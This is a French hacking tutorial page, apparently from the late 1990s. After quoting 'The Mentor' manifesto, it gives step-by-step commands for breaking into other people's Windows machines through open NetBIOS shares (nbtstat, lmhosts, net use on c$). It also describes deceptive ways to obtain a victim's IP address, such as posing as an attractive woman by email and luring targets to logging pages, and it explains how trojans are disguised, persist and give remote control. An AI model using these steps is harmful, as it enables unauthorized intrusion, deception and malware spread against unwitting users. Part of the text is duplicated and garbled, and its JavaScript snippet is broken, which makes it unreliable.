Descriptif du contenu de cette page:

1° 

Définition

2° 

Notion d'exploit

3° 

Adresses IP

4° 

Netbios sous Win 95/98/Millenium

5° 

Netbios sous Win NT/2000

6° 

Troyan Horse (cheval de Troie) 

7° 

Blooffer

8° 

Flooder

9° 

Sniffer

10° 

Scanner d'ip

11° 

Spoofing

12° 

Root

13°

Hack par ftp


Définition:

Un hacker c'est quoi? Pour la première définition de ce site, je vais essayer de m'appliquer... C'est un mec (ou une fille, désolé mais faut avouer que vous êtes en très forte minorité) qui rentre dans des ordinateur où il n'a pas de droit d'accès et qui jette un coup d'oeil un peu partout pour voir s'il trouve pas quelque chose d'intéressant. Certains affirmeront qu'ils sont là pour la régulation de l'Internet ou pour en refaire un espace fun et non un espace commercial comme il est de plus en plus voué à devenir. A chacun de voir... Définition pour les simples d'esprits et les personnes ayant un esprit particulièrement fermé: les hackers c'est les gentils et les crashers c'est les méchants. Quoi que des fois, dur de faire la différence entre un crasher et un hacker en colère...

Ca c'était ma définition perso mais il en existe une perso de "the mentor", très bien écrite et qui représente bien la manière dont pas mal de Hackers se sont mis au biz même si elle ne me correspond pas. Elle est cent fois mieux que la mienne et j'aimerais écrire comme lui. Mais j'ai pas fais Littéraire moi. arf ! vocation?

Définition de "The Mentor" : (écrite le 8 janvier 1986 et traduite par NeurAlien le 8 septembre 1994. source: Noway3)

+++ The Mentor +++

Un autre s'est fait prendre aujourd'hui, c'est partout dans les journaux. Scandale: Un adolescent arrêté pour crime informatique, arrestation d'un 'Hacker' après le piratage d'une banque...
Satanés gosses, tous les mêmes.

Mais avez vous, dans votre psychologie en trois pièces et votre profil technocratique de 1950, un jour pensé regarder le monde derrière les yeux d'un hacker? Ne vous êtes vous jamais demandé ce qui l'avait fait agir, quelles forces l'avaient modelé ?
Je suis un hacker, entrez dans mon monde...
Le mien est un monde qui commence avec l'école... Je suis plus astucieux que la plupart des autres enfants, les conneries qu'ils m'apprennent me lassent...

Je suis au collège ou au lycée. J'ai écouté les professeurs expliquer pour la quinzième fois comment réduire une fraction. Je l'ai compris. "Non Mme Dubois, je ne peux pas montrer mon travail. Je l'ai fait dans ma tête".
Satané gosses. Il l'a certainement copié. Tous les mêmes.

J'ai fait une découverte aujourd'hui. J'ai trouvé un ordinateur. Attends une minute, c'est cool. Ca fait ce que je veux. Si ça fait une erreur, c'est parce que je me suis planté.
Pas parce qu'il ne m'aime pas...
Ni parce qu'il se sent menacé par moi...
Ni parce qu'il pense que je suis un petit filous...
Ni parce qu'il n'aime pas enseigner et qu'il ne devrait pas être là...
Satanés gosses. Tout ce qu'il fait c'est jouer. Tous les mêmes.

Et alors c'est arrivé... Une porte s'est ouverte sur le monde... Se précipitant a travers la ligne téléphonique comme de l'héroïne dans les veines d'un accro, une impulsion électronique est envoyée, on recherche un refuge à l'incompétence quotidienne... Un serveur est trouvé.

Vous vous répétez que nous sommes tous pareils... On a été nourri à la petite cuillère de bouffe pour bébé à l'école quand on avait faim d'un steak... Les fragments de viande que l'on nous a laissé étaient pré-machés et sans goût. On a été dominé par des sadiques ou ignoré par des apathiques. Les seuls qui avaient des choses à nous apprendre trouvèrent des élèves volontaires, mais ceux ci sont comme des gouttes dans le désert.

C'est notre monde maintenant... Le monde de l'électron et de l'interrupteur, la beauté du Baud. Nous utilisons un service déjà existant, sans payer ce qui pourrait être bon marché si ce n'était pas la propriété de gloutons profiteurs, et vous nous appelez criminels. Nous explorons... et vous nous appelez criminels.
Nous recherchons la connaissance... et vous nous appelez criminels.
Nous existons sans couleur de peau, sans nationalité, sans dogme religieux... et vous nous appelez criminels.
Vous construisez des bombes atomiques, vous financez les guerres,
vous ne punissez pas les patrons de la mafia aux riches avocats,
vous assassinez et trichez, vous manipulez et nous mentez en essayant de nous faire croire que c'est pour notre propre bien être, et nous sommes encore des criminels.

Oui, je suis un criminel. Mon crime est celui de la curiosité. Mon crime est celui de juger les gens par ce qu'ils pensent et dise, pas selon leur apparence.
Mon crime est de vous surpasser, quelque chose que vous ne me pardonnerez jamais.

Je suis un hacker, et ceci est mon manifeste. Vous pouvez arrêter cet individu, mais vous ne pouvez pas tous nous arrêter... après tout, nous sommes tous les mêmes.

+++ The Mentor +++

Un citation d'un illustre inconnu pour moi mais qui dira sûrement quelque choses à pas mal d'entre vous:
"Savoir c'est vivre, et maintenir dans l'ignorance c'est presque un homicide" (cf: posse Assassin "Homicide Volontaire")


Notion d'exploit :

Me demandez pas pourquoi ça s'appelle comme ça, j'en sais rien, surtout que je trouve le nom particulièrement mal choisi. Les exploits ce sont des procédures que l'on exécute de la même manière chaque fois et qui ne demande pas trop que l'on réfléchisse. Un hacker qui ne fait que des exploits ne peut se considérer comme étant d'un bon niveau. Deux exploits très très connus ci-dessous: Win95 et WinNT. Un exploit est également un petit programme que l'on fait soit même, que l'on met sur un bécane une fois un brèche ouverte et qui travaille pour vous. Il fait en sorte de vous procurer des accès plus intéressants, notamment celui du root.


Adresses IP :
 

1° 

Définition

2° 

Fonctionnement

3° 

Trouver une ip

4° 

Cacher une ip

          -Définition:

Chaque ordinateur connecté à Internet en a une et elle sert à recevoir les informations que l'on demande via Netscape ou autre... et également à recevoir des E-Mails. Pour une question de sécurité ou de volonté de disponibilité d'adresses pour tout le monde, les adresses IP qui vous sont données par votre fournisseur d'accès changent à chaque connexion (IP dynamiques). Ce qui n'est pas le cas pour les serveurs et les sites de Fac par exemple. Donc si vous trouvez l'adresse IP d'une personne, il est très fortement probable qu'elle ne lui appartienne plus le lendemain.

          -Fonctionnement:

Une IP, qu'il est nécessaire de rentrer dans une commande nbtstat par exemple, est en fait une représentation numérique d'une adresse binaire 32 bits. Elle se décompose de la manière suivante: 152.32.45.210. Dans cet exemple, 152.32 est l'adresse d'un réseau, le 45 est celui d'un sous réseau et le 210 est l'adresse quoi que dans certains cas, les deux derniers numéros soient la composante d'une adresse (pour les fournisseurs d'accès Internet par exemple: AOL, c'est 152 pour le premier numéro, les trois autres variant constamment). Vu que c'est du 32 bits, une adresse IP ne peut pas dépasser 255.255.255.255.

Si vous voulez connaître le premier numéro de l'adresse ip de tel ou tel fournisseur d'accès, utilisez un scanner d'ip. Rentrez une adresse au hasard et regarder à quel fournisseur elle appartient et vous vous ferez ainsi une petite liste des ip des fournisseurs d'accès. Recommencez l'opération en changeant le premier numéro... C'est pas très intéressant et c'est chiant mais c'est pas si long à faire que ça. Les mecs qui ont programmé les scanners d'ip l'ont bien fait avant vous... Vous trouverez plusieurs scanner d'ip dans la partie progs de ce site.

          -Trouver une adresse ip :

Trouver une adresse ip au hasard c'est facile mais on ne sait pas à qui elle appartient. Voilà comment trouver l'ip d'une personne ou d'un serveur:

- On va commencer par le commencement: vous. Comment trouver son ip? tapez démarrer, exécuter, winipcfg (WINdows IP ConFiGurator), là vous obtiendrez des informations sur votre pc avec entre autre votre adresse ip. Si cette commande ne marche pas car vous n'avez tout simplement pas ce fichier, il existe une autre méthode, c'est de s'autonuker. Je sais c'est barbare mais on ne risque rien si l'on a placé une protection efficace, Dans la partie progs de ce site, j'ai mis un nuker qui permet d'installer une protection antinuke et aussi de s'autonuker. Si la protection est mise vous ne risquez rien et le nuker vous donnera votre adresse ip.

- Si vous voulez trouver l'adresse ip d'un serveur, vous poussez entrer une commande qui testera la rapidité avec laquelle vous dialoguez avec ce serveur. Avec la vitesse la commande vous donnera aussi l'adresse ip du serveur:
tapez: ping -a URLduserveur       exemple: ping -a www.assassin.com  l'URL du serveur est http://www.assassin.com/.
Cette commande doit être tapée sous dos.
Il existe une variance de la commande ping sur irc mais elle ne permet que de déterminer la rapidité des communications entre un membre et un autre membre. Pour trouver son adresse ip, on opère comme suit.

- Si vous êtes sur irc et que vous voulez trouver l'adresse ip d'une mec y étant également:
tapez: /dns pseudo_du_mec      exemple: /dns assassin   le mec a comme pseudo: assassin.
Cette commande doit être tapée sur irc.

- Si vous êtes sur icq et que vous voulez l'adresse ip d'un mec y étant aussi, il suffit d'aller dans ses infos. Pour cela, cliquez sur son pseudo puis sur info. S'il l'a caché, il y aura marqué N/A dans le place prévu à cette effet. Pour trouver son adresse, bien que ce petit futé l'ai caché, laissez la fenêtre info ouverte, mettez votre icq sur "offline" et fermez la fenêtre info. Maintenant retournez dans ses infos de la même manière et à l'endroit où il y avait marqué N/A, il y a maintenant son adresse ip.

- Une autre manière de trouver l'adresse ip d'une personne sous icq si vous avez une ancienne version d'icq ou si la précédente méthode ne marche pas, c'est netstat. Pour le lancer faites: Démarrer, Exécuter, et tapez "netstat". Là une fenêtre s'ouvrir mais se refermera très vite alors faites une copie d'écran à l'aide du bouton "Impr écran" du clavier. Pour que netstat marche, il faut que vous envoyez juste avant un message au mec dont vous voulez l'ip, puis lancez netstat, copie écran, coller dans paint et voilà, vous avez son ip.

- Une autre manière de trouver l'adresse ip d'un serveur c'est d'ouvrir ftp. Ftp existe pour permettre la transmission de fichiers. Pour le lancer, si vous êtes sous win, faites Démarrer, Exécuter, et tapez "ftp - n". Là, une fenêtre s'ouvre:
tapez: open URLduserveur. exemple: open www.assassin.com l'URL du serveur est ici www.assassin.com.
Cette commande doit être tapée sous ftp.

- Maintenant si vous voulez l'ip d'un mec ne se trouvant pas sur icq ni sur irc mais que vous savez qu'il est connecté (par exemple s'il utilise les salons d'abonné aol, infonie, club internet, ...), il y a un moyen c'est le mail. Mais c'est quand même beaucoup plus compliqué que les autres manières et c'est surtout chiant à faire mais peu connaissent cette méthode et beaucoup se sentent invulnérable du fait qu'ils croient que leur ip est cachée (pour le commun des mortels en tout cas). On va faire comme si vous étiez sur AOL. Une fois que vous avez repéré le mec de qui vous voulez l'ip, vous allez lui envoyer un Mail (son adresse est: pseudo@aol.com) par un serveur  POP3, c'est à dire un société d'envois de mails gratuits comme Yahoo, Caramail, multimania, ... Dans ce courrier vous allez poser une question quelconque mais vous allez faire croire au mec qu'il sagit d'un truc important pour vous et que vous avez besoin absolument d'une réponse. A vous de trouver la question. Vous pouvez vous faire passer pour une fille si c'est un mec, joindre une photo (belle) de vous (soit disant vous mais prenez la photo d'une fille assez jolie et non connue) pour que le mecs soit appâté. Ecrivez qu'un de ses potes vous a parlé de lui et que vous aimeriez le rencontrer... Bref, vous l'appâtez pour qu'il veuille vous répondre. Vous allez écrire dans le courrier que vous aimeriez une réponse rapide et même instantanée si possible (vu que c'est des ip dynamique, il faudra que vous l'ayez durant cette connection) mais que votre boite aux lettres aol ne marche pas et qu'il faut que, comme vous, il passe par le serveur POP3. Bien sur vous lui expliquez dans le mail comment faire et en détail car s'il a une quelconque question, vous êtes supposé injoignable et donc c'est foutu. Maintenant il va falloir qu'il aille regarder son courrier et pour ça il y a une commande cool sur aol dans les salon (malheureusement trop connue) qui permet de faire des sons notamment faire croire qu'il a du courrier. C'est commande est à taper dans le salon de discussion où le mec est. voilà la commande {S courrier. Trouvez une couleur pour que ça se camoufle avec le fond de l'écran et le tour est joué. Si vous n'êtes pas sur aol ou que vous avez peur qu'il le voit ou qu'il connaît déjà le technique, demander a un pote a vous que le mec ne connaît pas de lui dire qu'il vient de lui envoyer un mail. Le mec ne verra rien sauf votre mail et y répondra. Si il prend la tête a votre copain, dite lui de dire qu'il s'est trompé de pseudo et qu'il est désolé. Maintenant il va vous réécrire et passer par le serveur POP3. et quand vous recevrez le mail vous aurez ce qu'il a écrit plus plein de lignes en dessous avec plein de trucs en anglais. Voilà, normalement la première ligne contient l'ip du mec. Il y a pleins de lignes et pleins d'ip différentes mais si vous êtes pas trop con vous comprendrez aisément à qui elles appartiennent. Voilà, vous avez son ip, faites pas de conneries avec cependant. Si un mec essaye de chopper mon ip ou essaye cette technique avec moi je le décalque. Bien sur cette technique marche dans les deux sens ce qui veut dire qu'en envoyant le premier mail, le mec aura votre ip mais il y a peu de chance qu'il ait lu cet article et de toute façon c'est pas vous qui avez envoyé ce mail une blonde pulpeuse qui veut un rdv (ou une brune, je sais pas quelle photo vous mettrez ;-) ). Et de toute façon comme vous ne passez pas par aol, le mec ne connaîtra que le pseudo que vous aurez donné au serveur POP3. Là, si vous voulez, vous pouvez faire un lieu de votre adresse du POP3 à celle d'aol (c'est expliqué quand vous prendrez une nouvelle adresse là-bas)... attention il arrive des fois que vous n'obteniez de cette façon que l'adresse ip du pop3 du fournisseur d'accès internet du mec, dans ce cas là, dommage. Et tout les "nbtstat -A" n'y changeront rien.

- Une autre méthode si vous voulez avoir l'ip d'un mec ne se trouvant ni sur irc et icq, c'est NukeNabber. En effet ce programme vous permet de connaître l'ip d'un mec essayant de se connecter à votre pc et lui refusant systématiquement l'entrée. Bien sûr pour cela il faudra que vous lui donniez votre ip et qu'il sache ce que c'est car pour une personne n'y connaissant rien, que voulez vous qu'elle fasse de 4 nombres séparés entre eux par des points? Dès que la personne essaie d'entrez ou de vous nuker... vous avez son ip et bien sur vous n'êtes pas nuké.

- La dernière méthode que je connais pour avoir l'ip d'un mec ne se trouvant ni sur irc ni sur icq, c'est de le faire venir sur votre ordinateur. En effet une fois en connection avec votre pc, vous verrez l'ip du mec. Bien sûr il faut le faire venir et pour ça il va déjà falloir transformer votre pc en serveur. Alors soit vous avez linux et vous configurez un serveur PPP ou apache ou alors vous êtes sous win et vous devrez téléchargez servU (sur www.Download.com me dit Jah). Une fois installé et configuré, votre pc est devenu un serveur au même titre que ceux qui ont des sites sur Internet. La seule différence c'est que vous n'avez qu'une ip et pas d'adresse DNS (adresse DNS, c'est une adresse genre www.micro$hit.com. En effet pour qu'un serveur ait droit à une adresse de ce genre et non plus qu'une simple ip, il faut qu'il paye entre 500 et 1000 Frs à un organisme dont j'ai oublié le nom. Bah ouais c'est quand même plus facile à retenir une adresse DNS qu'une IP). Ca vous fait flipper ça! Et oui, n'importe qui ayant votre ip peut entrer dans votre pc par un accès ftp. Bien sûr la but ici n'est pas qu'il ait accès à votre "serveur" mais que vous ayez son ip alors vous allez mettre un firewall qui se chargera de ne faire entrer personne sur votre disque. Enfin juste assez pour que vous ayez son ip et que lui ne puisse rien faire une fois à l'intérieur. Si vous êtes sous windows, vous pouvez utiliser celui de McAfee disponible sur ce site partie progs ou le Conseal firewall (très bon) disponible bientôt. Si vous êtes sous linux, bah amusez vous à décompiler et recompiler le noyau une fois le firewall installé (youpi!).
Cette méthode est plus chiante que celle avec NukeNabber mais au moins vous pourrez avoir l'ip de tout le monde même de celui qui ne sait pas ce qu'est une ip. Pour l'amener sur votre serveur, il suffira de faire un liens dans le salon de discussion ou vous êtes et de lui demander de cliquer dessus et prétextant ce que vous voulez. Il suffit de dire que c'est votre site et que vous aimeriez un avis de sa part... Les personnes méfiantes pour les virus et les .exe ne le sont généralement pas pour les liens. Les seuls qui se méfieront c'est ceux qui connaissent la combine.

- Bon finalement c'était pas la dernière. Celle là j'hésitais à la donner car une fois donnée elle va être utilisée à profusion pour votre plus grand malheur à tous alors si vous êtes pudiques ne lisez pas ça car ça pourrait vous rendre parano à l'extrème et je vous avoue qu'il y a de quoi. Bon alors j'hésitais et comme j'hésite encore je ne vais vous donner qu'une partie (grande partie) de la réponse. Le truc c'est d'envoyer une personne sur un site qui a une adresse DNS et non juste une ip (et oui c'etait l'inconvénient de la combine du dessus) et la même si une personne connait la combine elle n'aura aucun moyen de savoir si vous voulez la pièger ou non. Le truc c'est de mettre une instruction en java dans votre page web qui lit l'ip du visiteur et l'envoit à votre adresse E mail. Il ne reste plus qu'à faire un lien vers votre site et que la personne clique dessus ou que vous donniez juste l'adresse. Le seul inconvenient de cette technique c'est que si plusieurs visiteurs viennent en meme temps vous ne saurez pas quelle est l'ip de la personne que vous voulez pièger. Mais bon pour ca il suffit d'envoyer la personne sur un page isolée ou personne ne peut aller s'il n'a pas eu de lien par vous. Un autre inconvenient c'est que la personne si elle se méfie trouvera votre adresse Email mais encore une fois il suffit de vous inscrire chez hotmail ou caramail pour que vous vous foutiez de perdre une boite aux lettres à cause d'un mailbombing. J'ai dis que je ne vous donnerais pas tout donc je vais vous donner l'instruction java qui trouve l'ip et l'affiche sur une page web mais je ne donnerais pas l'instruction permettant d'envoyer cette ip à une adresse Email ou à cacher cette ip du visiteur. Mais franchement si vous vous y connaissez un peu en java et en html ça ne devrait pas vous poser trop de problèmes. En tout cas moi j'en ai eu pour deux minutes. L'instuction java est la suivante:

<SCRIPT LANGUAGE="JavaScript">
myAddress2 = java.net.InetAddress.getLocalHost();
ip   = myAddress2.getHostAddress();
document.write("Ton adresse Ip est :"+ip);
</SCRIPT>

Voilà, bien sûr si la personne, pour se connecter à internet a utilisé un blooffer, un spoofer d'ip ou passe par un proxy, vous l'aurez dans l'os mais vous connaissez combien de personnes qui font ça avant de se connecter à internet à part moi? Ca doit répondre à votre question sur la fiabilité de la méthode.

          -Cacher son adresse ip :

J'imagine que vous n'avez pas de serveurs alors on va parler de la manière de cacher son ip pour un particulier, c'est à dire sous irc et icq.

- Sous icq, cliquez sur menu en bas à gauche de la fenêtre principale, puis sur préférence, puis connection, puis "i'm using a permanent internet connection (LAN)", puis "i am behind a firewall or proxy", puis firewall setting", puis "Firewall Settings", puis "I am using a SOCKS4 proxy server", puis next, là entrez l'adresse ip que vous voulez (pas la votre sinon ça ne sert à rien) et mettez le port 1080 (celui d'icq), puis next, Done, ok, et enfin ok. Icq va s'arrêter et quand vous le relancerez, votre adresse ip restera la même mais ceux qui chercheront la votre tomberont sur celle que vous avez défini plus haut. Cette méthode pourra entraîner quelques problèmes de connexion mais ils seront minimes. Le programme icq connaîtra toujours votre véritable ip sinon vous ne pourriez communiquer mais si quelqu'un la cherche il ne la trouvera pas, sauf s'il utilise un programme externe comme par exemple netstat (expliqué plus haut).

-Sous irc il va falloir faire appel au spoofing ce qui ne revient pas en fait à cacher son ip mais tout simplement en changer en prenant celle d'un autre mec connecté lui aussi sur irc. Cliquez ici pour savoir comment faire.
 


Netbios sous Win 95 / 98 / Millenium :

C'est du super connu, du super facile mais rigolez pas, c'est par ça que j'ai commencé et quand j'ai découvert cet exploit sur un site (ça fait longtemps maintenant) j'étais tout joisse (hyper méga content, pour ceux qui connaissent pas l'expression). Bon, ok ça marche une fois tout les 36 du mois et je peux vous dire que j'ai passé du temps avant de hacker ma première bécane avec cette méthode mais bon, c'est quand même de bons souvenirs. Cet exploit marche sous win95 mais aussi sous win98 mais pour cela il faut que l'utilisateur de la machine prise pour cible ait choisi le partage de fichiers (ce qui est plutôt rare car win95 et 98 c'est surtout pour les particuliers alors que le partage réseau est surtout utilisé par les entreprises mais les entreprises ne sont pas foule à posséder win95 sur leur serveurs).

Comme je n'utilise plus cet exploit depuis longtemps, je ne suis plus très au fait des manières de le réadapter, et il faudra que je me renseigne plus à fond sur ce que je vais vous affirmer maintenant. Mais j'ai l'impression que c'est exploit à de nouveau de beaux jours devant lui car windaube 98 dès son installation installe le partage de fichier (mais pas d'imprimante, mais ça, une fois dans la bécane ça se change). Donc pour les personnes (nombreuses) ne connaissant pas cet exploit, ne connaissant pas l'utilité du partage de fichiers, ou tout simplement n'y connaissant que dalle en informatique (ce qui est de plus en plus le cas avec ces ordinateurs tout installé et tout configuré, même Internet) sont à votre portée.

Cette info n'est pas du tout du 100% sûr mais je vérifierais et je vous tiendrais informé. N°1 sur l'info locale et internationale...

L'exploit:

C'est un exploit qui se réalise sous Dos puisqu'on utilise le NetBios et l'on a besoin d'une adresse IP, du nom de l'ordinateur distant, et que le propriétaire de ce dit ordinateur ait cliqué sur "partage de fichiers". Ok, ça fait beaucoup de choses à connaître mais vous allez voir, ça se décante vite. En fait ce qu'il vous faut c'est une ip que vous trouverez au hasard et qui doit être celle d'un ordinateur partagé (comprenez par là: avec ressources partagées).

Manière de procéder :

1°/  Pour le réaliser il faut ouvrir une fenêtre MS-DOS si vous êtes sous windows; là, tapez la commande suivante qui vous permettra de trouver le nom de l'ordinateur à qui appartient cette adresse ip:

nbtstat -A ip_de_l'ordinateur_distant

          Si vous avez pas compris, je donne un exemple:  nbtstat -A 125.35.23.210
          (l'adresse ip a été choisie au hasard et le A doit être en majuscule. Les espaces ont leur importance)

2°/  Ensuite vous allez voir apparaître différentes lignes de codes. Suivant si vous tombez sur une adresse étant attribuée ou pas, ces lignes diffèrent. Si un message d'erreur s'affiche (host not found), changez d'adresse, si des kyrielles de lignes s'affichent, c'est cool mais c'est pas suffisant. Il faut maintenant que la ligne suivante s'affiche parmi celles qui s'affichent.:

nom_de_l'ordinateur_distant<XX>UNIQUE Registered

          Si vous n'avez toujours pas compris, je vais vous redonner un exemple: assassin<20>UNIQUE Registered (assassin est le essage d'erreur s'affiche (host not found), changez d'adresse, si des kyrielles de lignes s'affichent, c'est cool mais c'est pas suffisant. Il faut maintenant que la ligne suivante s'affiche parmi celles qui s'affichent.:

nom_de_l'ordinateur_distant<XX>UNIQUE Registered

          Si vous n'avez toujours pas compris, je vais vous redonner un exemple: assassin<20>UNIQUE Registered (assassin est le nom de l'ordinateur distant. <XX>, XX est un nombre qui varie d'un
ordinateur à l'autre mais le 20 indique que les ressources sont partagées.)

3°/  Bon maintenant que vous avez l'ip et le nom de l'ordinateur distant, vous allez ouvrir et modifier l'éditeur de Dos en tapant la commande suivante: edit lmhosts

4°/  Maintenant que vous êtes dans l'éditeur de Dos, vous allez taper les commandes suivantes:

ip_de_l'ordinateur           nom_de_l'ordinateur              #PRE

          Si là encore vous avez rien pigé, je commence sérieusement à me demander si vous n'êtes pas un peu lamerz sur les                   bords. Mais comme j'ai une incroyable grandeur d'âme (sans modestie aucune), je vais encore une fois vous expliquer               avec un exemple: 125.35.23.210           assassin             #PRE
          (même chose que précédemment et respectez les majuscules à l'endroit où j'en ai mis)

5°/  Enregistrez et quittez l'éditeur. De retour sur le Dos, tapez la commande suivante:

nbtstat -R

          Vous devriez normalement obtenir: "Successful purge and preload of the NBT Remote Cache Name Table"

6°/  Tapez maintenant: net view \\nom_de_l'ordinateur

          C'est à ce moment la que tout se joue, si les ressources de cet ordinateur sont partagées, vous obtiendrez un inventaires             des ressources partagées (c,d,e, ...) sinon il n'y aura rien dans cet inventaire.

7°/  Placez vous dans le répertoire de windows (je vous explique pas comment faire, si vous savez pas, prenez des cours au CNED).

8°/  A présent tapez: net use \\nom_de_l'ordinateur\X

          Les espaces ont de l'importance et vous remplacerez naturellement "nom_de_l'ordinateur" par "assassin" et le X par la               lettre de la partition à laquelle vous désirez accéder. Si vous voulez accéder dans le répertoire où se trouve windows,               tapez c$ à la place du X.

Voilà, vous êtes sur le disque c de l'ordinateur distant ayant comme nom assassin et comme adresse IP 125.35.23.110, n'y faites pas trop de conneries; souvenez vous, c'est la partie hacking, pas crashing. Si vous avez besoin de revenir sur cet ordinateur à l'avenir, faites une recherche (démarrer, rechercher, ordinateur) et tapez "assassin".

Si c'est la première fois que vous utilisez cet exploit, il faut créer un fichier lmhosts, pour cela, allez sous dos et tapez:
Edit, nouveau, ip_de_l'ordinateur          nom_de_l'ordinateur_distant          #PRE, sauvegarder, lmhosts, exit.
Le fichier lmhosts doit se trouver dans le répertoire windows.

C'était un bon petit exploit pour ceux d'entre vous qui débutent et de la rengaine pour les autres. En tout cas je voyais pas mon site sans ce classique.


Netbios sous Win NT / 2000 :

C'est exactement la même chose que pour windaube 95 ou 98 sauf que vous n'avez pas besoin de créer de fichier lmhosts et qu'il y a beaucoup plus de chances que les ressources soient partagées. Et vu que c'est la même chose, je vous conseillerais de regarder ci-dessus car je n'ai pas l'intention de me répéter plus qu'il ne faut. ;-p


Troyan Horse (cheval de Troie) :

Le cheval de Troie, qu'est ce que c'est? C'est pas un truc en bois construit pas des mecs en armure pour prendre une ville fortifiée par la ruse, en tout cas, pas là. Si ça s'appelle comme ça, vous l'aurez compris, c'est parce que ça reprend la méthode... La forteresse c'est le PC, le cheval c'est le prog, l'assaillant c'est toi et la victime est dans la merde. Le biz consiste à envoyer à un mec le troyen et de lui faire croire qu'il sagit d'autre chose... Le mec le lance et là, si vous avez son adresse IP, vous pouvez contrôler son ordinateur. Quand je dis contrôler c'est tout contrôler, vraiment tout. Vous pouvez imprimer des trucs avec son imprimante, lui piquer des fichiers, jouer à ses jeux, formater son disque, diriger le pointer de sa sourie, piquer ses passwords ...etc... C'est en partie pour ça que je considère le troyen plus comme un programme de crashers mais j'ai tenu malgré tout à le mettre dans cette rubrique. Me demandez pas pourquoi, les lubies du Webmaster sans doute.

Le troyen a existé en trois versions différentes à ce que je sache. Les deux premiers étaient des progs que l'on envoyait en faisant croire que c'était autre chose (des nukers par exemple, ça intéresse tellement de monde sous irc) mais dès le lancement du programmes, un message d'erreur s'affichait ( genre: GT0075FR.dll has not found ) et vous étiez infecté alors que vous pensiez juste: "Merde, ça marche pas". Et puis un jour, sans savoir pourquoi, alors que vous reveniez sur irc, vous n'avez plus le contrôle de votre pc, dommage...

La troisième version est la plus sadique, elle se compose comme les précédentes de deux parties, l'une que l'on envois à la victime et l'autre que l'on garde et qui nous permet de contrôler l'ordinateur disant. Dans cette version, on garde les deux progs, car ce que l'on envois n'est plus un troyen mais un programme sain (la dernière version de netscape par exemple) que l'on a infecté avec un troyen. Et ce qui est terrible c'est que le programme infecté n'augmente même pas de volume (certains disent que le prog augmente de 100 Mo mais c'est faux) et qu'il fonctionne très bien.

Il ne faut pas que ceci vous incite à ne plus revenir sous irc ou icq car il existe des "bouffe-troyens" qui, je vous le donne en mille, ... Ca se trouve très facilement d'ailleurs, dans la partie progs de ce site, vous trouverez les différents troyens existants ainsi que le bouffe-troyens. Je donne ces informations car comme je le disais plus haut, c'est des progs de crashers. Et ces personnes donnant une mauvaise image du Hacking... sus.

A cela des petits futés ont trouvé une parade, un prog tout con qui ne peut se faire détecter par un bouffe-troyen car il ne ne se met en service que quand un bouffe-troyen vérifie le système. Donc jusque là il n'est pas considéré comme troyen. Alors la personne très contente de posséder ce prog miracle ne se doute pas quelle est contaminée et...

Alors quand on vous envois un prog par Internet, vous le testez avec le bouffe-troyen au moins deux fois de suite et vous avez 99% de chances qu'il ne vous arrive rien. Mais bon comme les mecs qui programment ces trucs auront toujours une longueur d'avance sur ceux qui essayent de les en empêcher... faites gaffe de ne pas accepter des .exe, .bat, .zip et .com de tout le monde. Clickez pour télécharger un bouffe troyen. La version que je propose ici neutralise les troyens suivants: rundlls, dmsetup, dmsetup2, sockets de troie (version 1, 2.0, 2.3 et 2.5), control of sockets de troie (version 1 et 2.5), hacker's paradise,  backdoor, ICKiller, backorifice 120, netbus (version 1.53 et 1.6) et icqtrojen.

Avec BO (back Orifice) il y a un autre moyen de voir si vous avez été infecté mais ça ne marche que pour BO et ça n'empêche pas au bouffetroyen d'être efficace. Cette manière c'est de faire un ping vers l'ip 127.0.0.1 et si vous y voyez le nom de votre ordinateur c'est que vous êtes infesté. :-(

Comment ça marche? :

Dès que la victime lance la partie virus du troyen (celle qu'on lui refile), le programme va chercher a créer plusieurs fichiers .exe (généralement 3). La partie virus ne sert qu'à créer ces fichiers. Les fichiers sont souvent crées dans Windows/System mais ça dépends en fait de troyens. Si ils se foutent là c'est pour une bonne raison. Tous les ordinateurs ayant windows ont un point commun, ils ont windows (si si). Vous allez dire: "merci, ca nous renseigne vachement". Mais ca permet au troyen de ne pas a avoir a chercher un emplacement sympa différent dans chaque bécane ou il va. Je sais pas si vous êtes déjà allé faire un tour dans le répertoire system, mais il y a des tas de programme et personne n'est foutu de tous les retenir ou de dire a quoi ils servent tous.

Une fois bien caché et reproduis en suffisamment grand nombre pour que vous ne les viriez pas tous, ils vont chercher à se lancer au démarrage de la machine. Pour cela, ne croyez pas qu'il vous se contenter de se foutre dans Windows/Menu démarrer/Démarrage, ce serait trop simple, trop visible et surtout trop facile de les retrouver (quoi que je suis persuadé que plusieurs d'entre vous ne connaissaient même pas la fonction de ce répertoire ;-) ). Ils vont essayé de mettre une ligne de code qui les lancera au démarrage dans l'autoexec.bat à un endroit bien caché. C'est sûr que si vous avez deux applications qui se lancent au démarrage, vous voyez ces lignes tout de suite (et donc le nom et l'endroit où se trouvent les troyens) mais ça arrive qu'il y ait des centaines de lignes dans l'autoexec.bat et là c'est une autre affaire de les trouver. Encore plus vache, ils vont essayer de se mettre ces mêmes lignes dans la base de registre de windows. Pour ceux qui ne savent pas ce qu'est la base de registre de windows, c'est le coeur de win. C'est la que les informations sur tous ce que vous avez sur votre disque est écrit: les passwords, les nom des fichiers et leur places, la vitesse de défilement des fenêtres quand elles se minimisent... Si tu maîtrises la base de registre, tu maîtrises tout. Ces tonnes d'informations sont consultables en lançant Regedit dans Exécuter. Allez jeter un coup d'oeil et vous comprendrez pourquoi ils se foutent là. Si vous connaissez pas l'emplacement où ils se mettent c'est même pas la peine d'espérer. Mais les anti troyens les trouvent très bien donc il n'est pas nécessaire de connaître l'emplacement mais si malgré tout vous voulez la connaître, mailez moi.

Leur but n'est pas simplement de se lancer au démarrage ou de se reproduire. Ils ont fait ca pour leur propre sécurité et pour être sûr de pouvoir être opérationnel dès que la bécane est allumée. Opérationnel pourquoi? Les moyens de rentrer sur une bécane sont les ports et pour y rentrer il faut qu'ils soient ouverts. Les programmes crées sur la bécane de la victime servent à ça. Le port le plus souvent utilisé est le telnet (port 23) mais d'autre comme le ftp peuvent aussi servir. Ces programmes se camouflent de manière à ce que vous ne puissiez pas voir s'ils sont lancés et donc ne pas les interrompre. ex: Alt + Ctrl + Suppr n'est pas efficace pour les stopper puisque leur nom ne se trouve pas dans la fenêtre de win.

La deuxième partie du troyen, celle que vous n'avez pas envoyé a la victime vous sert de poste de contrôle en quelque sorte et permet de communiquer avec les programmes crées sur le disque de la victimes. C'est pour ça qu'ils doivent rester opérationnel, pour que vous ne puisiez pas perdre la connection avec le pc de la victime (si bien sûr elle est connectée).

